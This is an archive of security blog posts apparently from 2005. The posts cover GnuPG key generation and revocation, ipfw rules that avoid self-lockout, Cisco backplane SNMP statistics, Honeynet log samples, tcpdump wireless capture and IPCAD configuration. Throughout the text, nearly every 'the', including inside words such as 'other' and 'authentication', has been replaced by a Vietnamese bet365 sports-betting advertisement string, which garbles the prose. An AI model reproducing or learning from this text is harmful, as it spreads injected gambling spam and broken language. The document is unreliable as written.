sec   1024D/752B57C7 2005-04-23
uid                  Richard Bejtlich richard_at_taosecurity_dot_com
ssb   2048g/8BA44991 2005-04-23

Here's how to see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 key fingerprint. The fingerprint is a way to describe my key in shorthand form.

orr:/home/richard$ gpg --fingerprint
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/pubring.gpg
--------------------------------
pub   1024D/752B57C7 2005-04-23
      Key fingerprint = 2B43 9A2E 6925 D581 5E34  FD6B 020C E655 752B 57C7
uid                  Richard Bejtlich richard_at_taosecurity_dot_com
sub   2048g/8BA44991 2005-04-23

To make my public key available in ASCII form, I exported it to a file.

orr:/home/richard$ gpg --export --armor richard_at_taosecurity_dot_com
 > richard_at_taosecurity_dot_com.key.gpg.asc
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You can access my public key here.

Now I wanted to create a revocation key, to assist me in removing my public key from a keyserver should my private key ever be compromised.

orr:/home/richard$ gpg --gen-revoke richard_at_taosecurity_dot_com > 
 richard_at_taosecurity_dot_com.com.revoke.gpg.asc
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

sec  1024D/752B57C7 2005-04-23 Richard Bejtlich richard_at_taosecurity_dot_com

Create a revocation certificate for this key? (y/N) y
Please select cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 reason for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 revocation:
  0 = No reason specified
  1 = Key has been compromised
  2 = Key is superseded
  3 = Key is no longer used
  Q = Cancel
(Probably you want to select 1 here)
Your decision? 0
Enter an optional description; end it with an empty line:
Revoke
 
Reason for revocation: No reason specified
Revoke
Is this okay? (y/N) y

You need a passphrase to unlock cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

Enter passphrase: 
                  
ASCII armored output forced.
Revocation certificate created.

Please move it to a medium which you can hide away; if Mallory gets
access to this certificate he can use it to make your key unusable.
It is smart to print this certificate and store it away, just in case
your media become unreadable.  But have some caution:  The print system of
your machine might store cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 data and make it available to ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs!
orr:/home/richard$ chmod 400 richard_at_taosecurity_dot_com.revoke.gpg.asc 

Finally, I wanted to make this new public key available on public keyservers. I have to specify my public key ID 752B57C7, which is seen in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 --list-keys output above and is also cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 last eight characters of my key fingerprint.

orr:/home/richard$ gpg --send-keys 752B57C7
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: sending key 752B57C7 to hkp server subkeys.pgp.net

I also submitted my public key to www.keyserver.net, which has a Web-accessible search form. By default GnuPG sent my key to subkeys.pgp.net, Web page. To search cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 pgp.net keyservers, visit www.pgp.net/pgpnet/wwwkeys.html.

If someone cares to send me a message encrypted with my public key, a future blog entry will show how to decrypt it.

ZDNet BSD Certification Coverage and More

Joe Brockmeier published an interview with Dru Lavigne, chair of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 BSD Certification Group. I'm a member of that organization and I will be present at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 BSDCan 2005 BoFs to discuss BSD certification with any interested parties. Dru's interview provides additional background on our progress towards creating respected, valuable BSD certifications.

Most importantly, today our Task Analysis Survey is publicly available. This is a Web-based questionnaire that we hope BSD users like you will complete. Our goal is to learn what BSD users and administrators consider to be cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 essential administration tasks for BSD systems. Please help us out by completing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 survey no later than midnight GMT 22 May 2005. Thank you!

Todd Lammle Teaches CCNA in Denver in June

You may have followed my recent journey towards passing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CCNA exam. My instructor Todd Lammle just told me he will be teaching anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r CCNA class in Denver, from 13 to 17 June. This is a rare event as Todd runs cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 training company GlobalNet Training and stays very busy.

Todd is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 author of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 best-selling CCNA: Cisco Certified Network Associate, Deluxe Edition (640-801), 4th Ed which helped immensely. I highly recommend attending this class if you want to pass your CCNA. If you decide to go, please email me at taosecurity at gmail dot com. I would like to hear what you think of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 class.

Cross-platform Pf Guide

Cross-platform Pf GuideWhile cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 official OpenBSD Pf guide is very good, I recommend those wishing to learn more about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Pf firewall check out Peter N. M. Hansteen's Firewalling with Pf guide. I like this document because it shows how to get Pf working on OpenBSD, FreeBSD, and NetBSD. Peter also covers cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most common deployment scenarios and he addresses topics I consider important. Check it out if you're considering a Pf-based firewall solution.

FreeBSD News

I have some good FreeBSD news to report. FreeBSD 5.4-RC3 was announced Monday. Although cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 schedule still calls for a 26 April release date, I believe we will not see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 RELEASE until cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first week in May. According to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 announcement:

"Due to one major issue that crops up on large (4-processor) systems under heavy load that is still being debugged cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re will be at least one more RC added to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 schedule. Timing for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 extra RC and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new Release date have not been set yet."

I am hoping that FreeBSD 5.4 will be cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 release that convinces 4.x users to upgrade. I have not had any problems running FreeBSD 5.3 since it arrived last November, but ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs are more cautious.

There's an interesting freebsd-stable thread with several hints on updating systems. This post by Aristedes Maniatis recommends using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following command to preserve access to a system when you accidentally lock yourself out while modifying firewall rules.

echo "ipfw add 1 pass all from any to any" at now +10 minutes

He continues with "Then if all goes OK, use atq to remove cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 queue item. If not, wait 10 minutes..."

That is great advice. I have heard of "people" locking cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365mselves out of systems while modifying firewall rules.

David Talkington offered an alternative method to avoid lockout -- using IPFW's set 31 feature. From cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 manual:

set set_number
 Each rule is associated with a set_number in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 range 0..31.
 Sets can be individually disabled and enabled, so this parameter
 is of fundamental importance for atomic ruleset manipulation.  It
 can be also used to simplify deletion of groups of rules. 
 If a rule is entered without specifying a set number, set 0
 will be used.
 Set 31 is special in that it cannot be disabled, and rules in set
 31 are not deleted by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ipfw flush command (but you can delete
 cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ipfw delete set 31 command).  Set 31 is also used
 for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 default rule.

Here is how a normal IPFW rule (numbered 5000) is added, say to disable ICMP.

drury:/root# ipfw add 5000 deny icmp from any to any
05000 deny icmp from any to any
drury:/root# ipfw list
05000 deny icmp from any to any
65535 deny ip from any to any

If I flush cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 rules, only cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 default allow rule at bottom remains:

drury:/root# ipfw flush
Are you sure? [yn] y

Flushed all rules.
drury:/root# ipfw list
65535 deny ip from any to any

Now I add a set 31 rule. The syntax would be something like this:

drury:/root# ipfw add 10000 set 31 allow ip from 192.168.1.0/24 to any
10000 allow ip from 192.168.1.0/24 to any
drury:/root# ipfw list
10000 allow ip from 192.168.1.0/24 to any
65535 deny ip from any to any

This adds rule number 10000 with set 31. It allows any traffic from a defined subnet. Now I flush cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 rules and check cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 results.

drury:/root# ipfw flush
Are you sure? [yn] y

Flushed all rules.
drury:/root# ipfw list
10000 allow ip from 192.168.1.0/24 to any
65535 deny ip from any to any

I can rid myself of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 set 31 rule using this method.

drury:/root# ipfw delete 10000 disable 31
drury:/root# ipfw list
65535 deny ip from any to any

On a different subject, Jean Simon mentioned cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 nextboot utility to specify an alternate kernel after performing an upgrade.

TaoSecurity Visits cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Pentagon

This morning I was pleased to speak at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Pentagon on behalf of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Network Security Services-Pentagon section of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 US Army Information Technology Agency. (I would like to provide a URL, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re's no point linking to sites that return "403.6 Forbidden: IP address rejected" errors!) Doug Steelman, pictured with me in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 photo below, invited me to discuss network security monitoring at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir Pentagon Security Forum. Last month Erik Birkholz and Steve Andres from Special Ops Security spoke on assessments. Next month Kevin Mandia of Red Cliff Consulting will discuss incident response. Doug and his colleague Mark Orlando were kind enough to take me on a tour of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 building and share some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir approaches to detecting intrusions on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Pentagon's networks.

While I will not outline specifics here, I will say I was impressed by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 variety of network traffic cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Pentagon collects. They are not a single-solution shop that can be beaten by evading one variety of intrusion detection system deployed at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 perimeter. Racá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y gacá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r alert, session, and statistical data and have cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 capability to collect some full content data. I will not name tools, but I was surprised by some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir choices. By this I mean cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y seemed genuinely interested in novel approaches to identifying and validating security events.

As far as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Pentagon network is concerned, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are literally an ISP in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir own right. They have multiple Autonomous Systems (AS') and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y connect to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 DISA backbone with 100 Mbps ATM links. After September 11th 2001 cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y decided to reengineer cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir network to be more disaster-resilient, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are now deploying a MPLS-based routing design to facilitate this goal. I look forward to meeting and working with this team in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 future, and I thank Doug and Mark for being great hosts today.

Researching Cisco Switch Backplane Statistics

While teaching at USENIX last week, I discussed SPAN ports. I mentioned that copying traffic to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SPAN port was less important than moving packets through cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 switch. One of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 students asked if measuring cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 utilization of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 switch backplane would reveal how well cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 switch was performing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SPAN function. Anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r student said cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re was a Simple Network Management Protocol Management Information Base (SNMP MIB) from which backplane statistics could be retrieved. I decided to research this issue as it affects using switches to collect traffic for network security monitoring. (Incidentally, Talisker offers SPAN port configuration advice for all sorts of switches.)

One answer appears in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Cisco document How to Get Catalyst Switch Backplane Utilization Using SNMP. This sounds promising until we read "cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 information in this document is valid for Cisco Catalyst switches that run Catalyst code only." Since modern Cisco switches run IOS, we seem out of luck.

That document produced several leads. First, it mentioned cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CISCO-STACK-MIB. Finding this MIB clued me in to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 multitude of MIBs offered by Cisco. They are available via FTP from ftp://ftp.cisco.com/pub/mibs/.

The link to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CISCO-STACK-MIB brought me to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SNMP Object Navigator. This is a really helpful tool. You can search object names and descriptions to receive a list of matching objects and MIBs for terms like backplane.

Anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r excellent resource is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 MIBs Supported by Product tool. For example, here are all of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 MIBs supported by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Cisco 2950 switch.

Cisco offers a few ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r helpful sites. These include cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Cisco IOS MIB Tools page. That site has a link labelled MIB Locator. Follow it, select your IOS release, platform family (device), and IOS feature set, and you will learn what MIBs are present. Also useful are SNMP: Frequently Asked Questions About MIBs and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 IP Application Services page for SNMP.

Getting back to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 original question -- cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 original Cat OS discussion of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CISCO-STACK-MIB mentioned cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 sysTraffic Object Name as a place to find backplane information. Specifically, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 description reads "Traffic meter value, i.e. cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 percentage of bandwidth utilization for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 previous polling interval." The question now is to find out what Cisco devices support providing this information via SNMP. The View Supporting Images link on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 sysTraffic page shows cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Cisco IOS images which offer this SNMP value.

According to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 results, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Cisco 3550 appears to be cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 cheapest switch which provides backplane statistics. I guess I won't be able to test this on my 2950! If anyone else managed to try this out, perhaps using snmpwalk from Net-SNMP, please post a comment.

New Honeynet Project Challenge

I saw that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Honeynet Project announced a new Scan of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Month last week. The evidence consists of Apache logs, Linux syslogs, Snort logs, and IPTables firewall logs. Here are examples.

From cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Apache access log:

210.116.59.164 - - [13/Mar/2005:04:05:47 -0500]
 "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 1063 "-" "-"

From cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 /var/log/messages syslog:

Mar 13 22:50:53 combo sshd(pam_unix)[9356]:
 aucá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ntication failure; logname= uid=0 euid=0
 tty=NODEVssh ruser= rhost=h-67-103-15-70.nycmny83.covad.net  user=root

From cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Snort logs, apparently captured via syslog:

Feb 25 12:21:33 bastion snort: [1:483:5] ICMP PING CyberKit 2.2 Windows
 [Classification: Misc activity] [Priority: 3]: {ICMP} 
 70.81.243.88 -> 11.11.79.100

Finally, from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 IPTables logs:

Feb 25 12:11:24 bridge kernel: INBOUND TCP: IN=br0
 PHYSIN=eth0 OUT=br0 PHYSOUT=eth1
 SRC=220.228.136.38 DST=11.11.79.83 LEN=64 TOS=0x00
 PREC=0x00 TTL=47 ID=17159 DF
 PROTO=TCP SPT=1629 DPT=139 WINDOW=44620 RES=0x00 SYN URGP=0  

Let's see how much data is in each of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 logs. I used 'wc' to count lines in each of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 sets of logs.

• Apache: 7,620


• Syslog: 3,925


• Snort: 69,039


• IPTables: 179,752


• Total: 260,336

So, we have over 260,000 lines of log entries to review. This seems fairly crazy to me. As a NSM practitioner who advocates collecting session and full content data, I am often criticized by those who consider it too difficult or expensive to collect such forms of network evidence. This Scan of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Month presents cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 alternative -- working though line after line of text-based log entries. Now what is more expensive, in terms of time and resources?

You might say I would have cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same problem analyzing this intrusion using NSM techniques. You might believe Snort would yield cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same number of alerts whecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r configured to emit text-based records via syslog or alerts for presentation by Sguil.

I guarantee I could determine if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 system was compromised, and by how many parties, faster using NSM techniques than manual log analysis.

I would also know exactly what network traffic cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 intruder launched against cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 target, regardless of whecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r or not it triggered a Snort alert. I would not have to look at text-based IPTables representations of packet movement. I could instead look at session data, which summarizes cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 thousands of packets in a flow into a single record.

I believe cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 winner of this SotM will end up being a Perl or Awk wizard who can parse cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 logs efficiently to reduce cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 number of lines to be analyzed.

This is still a useful challenge. If cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is any data available at all after a compromise, it is often in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 form of Web logs, syslogs, and so on. It is important to know how to interpret such evidence, if that is all cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is to analyze. Still -- imagine cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 possibilities when NSM-based evidence is collected!

Speaking at Net Optics Think Tank Event in May

I will be presenting my thoughts on pervasive network awareness as facilitated by taps at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next Net Optics Think Tank. The event will take place on 18 May 2005 in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir Sunnyvale, CA headquarters. I use Net Optics taps to gain access to traffic when performing network security monitoring.

Red Cliff Article on Web Browser Forensics

I just learned of a new article, Web Browser Forensics, Part 1 by Keith J. Jones and Rohyt Belani of Red Cliff Consulting. This is part one of two articles, and it features a variety of methods to learn about a user's Web browsing history. Any time digital forensics appears in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 news, it is often based on discovering a person's Web browsing activites. The Chandra Levy case is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 canonical example.

Wireless Traffic Snippets

In my USENIX talk I show how to collect wireless traffic using Tcpdump. In my slides I use a verbose method that only shows a few packets. In cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following I'd like to show a variety of traffic available using Tcpdump.

First I tell my wireless card to go into monitor mode and watch channel 1. Then I ask Tcpdump to show me cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 media types it understands.

orr:/root# ifconfig wi0 mediaopt monitor channel 1 up
orr:/root# tcpdump -i wi0 -L
Data link types (use option -y to set):
  EN10MB (Ecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rnet)
  IEEE802_11 (802.11)
  IEEE802_11_RADIO (802.11 plus BSD radio information header)

Now that I see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 media types, I select cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 second option and begin capturing traffic.

orr:/root# tcpdump -n -i wi0 -y IEEE802_11
tcpdump: data link type IEEE802_11
tcpdump: WARNING: wi0: no IPv4 address assigned
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wi0, link-type IEEE802_11 (802.11), capture size 96 bytes

First we see a beacon with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 conference wireless access point SSID. Next is one of many clear-to-send packets.

00:21:19.586724 Beacon (usenix) [1.0* 2.0 5.5 6.0 9.0 11.0 12.0 18.0 Mbit] ESS CH: 1
00:21:19.587160 Clear-To-Send RA:00:0f:34:42:b7:20 
...truncated...

Here's more CTSs and a NetBIOS port 137 UDP query.

00:21:19.915245 Clear-To-Send RA:00:0d:54:9c:5c:0b 
00:21:19.926293 IP 131.106.56.95.137 > 172.30.0.255.137: NBT UDP PACKET(137):
 QUERY; REQUEST; BROADCAST
00:21:19.938333 Clear-To-Send RA:00:0f:34:42:b7:20 
...truncated...

We see our first 802.11 acknowledgement.

00:21:20.273184 Clear-To-Send RA:00:0f:34:42:b7:20 
00:21:20.277588 Acknowledgment RA:00:90:4b:ae:8e:43 
00:21:20.279822 Clear-To-Send RA:00:0f:34:42:b7:20 
...truncated...

Here's our first request to send.

00:21:20.710353 Clear-To-Send RA:00:0d:54:9c:5c:0b 
00:21:20.711677 Request-To-Send TA:00:0d:54:9c:5c:0b 
00:21:20.712081 Clear-To-Send RA:00:0d:54:9c:5c:0b 
...truncated...

I don't know what cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 LLC packet means, but it's quickly followed by a probe request and response.

00:21:20.858267 Clear-To-Send RA:00:0f:34:42:b7:20 
00:21:20.859258 [|llc](LLC 000d) 
00:21:20.859604 Acknowledgment RA:00:0d:54:9c:5c:0b 
00:21:20.860719 Probe Request () [1.0 2.0 5.5 11.0 Mbit]
00:21:20.862199 Probe Response (usenix)  [1.0* 2.0 5.5 6.0 9.0 11.0 12.0 18.0 Mbit] CH: 1
00:21:20.862469 Acknowledgment RA:00:0f:34:42:b7:20 
00:21:20.863118 Clear-To-Send RA:00:0f:34:42:b7:20 
...truncated...

We don't only see broadcast traffic. Here's a couple TCP packets:

00:21:26.612946 Clear-To-Send RA:00:0d:93:ec:5f:ba 
00:21:26.619326 IP 216.239.57.105.80 > 131.106.58.64.1614:
 F 126736513:126736513(0) ack 2074693501 win 8190
00:21:26.620840 IP 216.239.57.105.80 > 131.106.58.64.1614:
 F 0:0(0) ack 1 win 8190
...truncated...

Here's an ARP request.

00:21:30.564116 Clear-To-Send RA:00:0f:34:42:b7:20 
00:21:30.566783 arp who-has 131.106.56.11 tell 131.106.56.32
00:21:30.567184 Clear-To-Send RA:00:0f:34:42:b7:20 
...truncated...

Last, here's a DHCP request.

00:21:32.238510 Clear-To-Send RA:00:90:96:a6:6a:70 
00:21:32.252827 IP 131.106.56.64.68 > 255.255.255.255.67:
 BOOTP/DHCP, Request from 00:90:96:ab:c6:10, length: 300
00:21:32.254038 Acknowledgment RA:00:90:4b:ae:8e:43 
00:21:32.275796 Clear-To-Send RA:00:0f:34:42:b7:20 

That was cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 IEEE802_11 media option. Unfortunately, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 IEEE802_11_RADIO option does not seem to produce anything useful.

orr:/root# tcpdump -n -i wi0 -y IEEE802_11_RADIO
tcpdump: data link type IEEE802_11_RADIO
tcpdump: WARNING: wi0: no IPv4 address assigned
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wi0, link-type IEEE802_11_RADIO
 (802.11 plus BSD radio information header), capture size 96 bytes
00:26:12.788071 [|802.11]
00:26:12.788915 [|802.11]
00:26:12.789331 [|802.11]
...truncated...

This is nothing special, but it does show what you can capture using Tcpdump while not being associated with a wireless network.

Notes on IPCAD

Tomorrow morning I teach Network Security Monitoring with Open Source Tools at USENIX 05. I've been taking anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r look at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 tools I will be presenting tomorrow to ensure I'm up-to-date on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir latest versions and features.

One of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 tools I talk about is IPCAD, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365
IP Cisco Accounting Daemon by Lev Walkin. I discuss IPCAD in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 section on statistical data for network security monitoring (NSM) in my book and my talk. I like IPCAD because it presents data just like one sees with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Cisco show ip accounting command. I actually used IPCAD in an incident response scenario several years ago, before I learned of Carter Bullard's Argus.

The version available in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 FreeBSD ports tree (net-mgmt/ipcad) requires more entries in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ipcad.conf file than what I present in my book and slides. Here is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ipcad.conf file I created after I installed IPCAD using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 FreeBSD port.

capture-ports disable;
interface wi0;
rsh enable at 127.0.0.1;
rsh root@127.0.0.1 admin;
dumpfile = ipcad.dump;
chroot = /var/ipcad;
memory_limit = 1m;

Before starting IPCAD, I created cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 directory /var/ipcad to hold cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ipcad.dump file. Here's how I started IPCAD.

orr:/root# ipcad -drs
Opening wi0... [LCap] [4096] Initialized as 1
Configured RSH Server listening at 127.0.0.1
Can't open dump file ipcad.dump
Daemonized.

The -drs meant "daemonize," "import saved accounting table on startup," and "save cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 active accounting table on exit," respectively. Starting IPCAD opened a rsh server on my loopback address.

orr:/home/richard$ sockstat -4
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS      
root     ipcad      736   3  tcp4   127.0.0.1:514         *:*
root     dhclient   551   5  udp4   *:68                  *:*
root     sendmail   397   4  tcp4   127.0.0.1:25          *:*
root     sshd       391   4  tcp4   *:22                  *:*

Once IPCAD was running, I could query it as shown next. I ignore cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "Connection refused" error caused by running an IPv6-enabled TCP/IP stack but not offering cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 rsh server in an IPv6-enabled manner.

orr:/root# rsh localhost stat
connect to address ::1: Connection refused
Trying 127.0.0.1...
Interface wi0: received 833, 5 m average 773 bytes/sec, 1 pkts/sec, dropped 0
Flow entries made: 32
Memory usage: 0% (2816 from 1048576)
